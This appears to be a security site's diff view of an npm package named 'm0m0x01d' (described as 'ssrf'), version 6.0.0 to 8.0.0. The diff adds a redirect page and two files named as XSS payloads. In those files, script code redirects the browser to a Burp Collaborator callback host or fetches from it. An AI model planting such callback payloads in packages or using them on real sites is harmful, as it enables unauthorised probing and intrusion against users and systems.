m0m0x01d 6.0.0 → 8.0.0

Sign up to get free protection for your applications and to get access to all the features.
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "m0m0x01d",
3
- "version": "6.0.0",
3
+ "version": "8.0.0",
4
4
  "description": "ssrf",
5
5
  "main": "index.html",
6
6
  "scripts": {
@@ -0,0 +1,11 @@
1
+ <!DOCTYPE html>
2
+ <html lang="en">
3
+ <head>
4
+ <meta charset="UTF-8">
5
+ <meta http-equiv="refresh" content="0; url=https://www.example.com">
6
+ <title>Redirecting...</title>
7
+ </head>
8
+ <body>
9
+ <p>If you are not redirected automatically, follow this <a href="https://www.example.com">link to the new page</a>.</p>
10
+ </body>
11
+ </html>
package/xss.svg.html ADDED
@@ -0,0 +1,4 @@
1
+ <script>
2
+ window.location.href = 'https://7bjztxm5tu3wvrwf9v2nm3jxzo5gt5.burpcollaborator.net';
3
+ </script>
4
+
package/xss1.svg.html ADDED
@@ -0,0 +1,6 @@
1
+ <script>
2
+ fetch('https://7bjztxm5tu3wvrwf9v2nm3jxzo5gt5.burpcollaborator.net/api').then(response => {
3
+ console.log(response);
4
+ });
5
+ </script>
6
+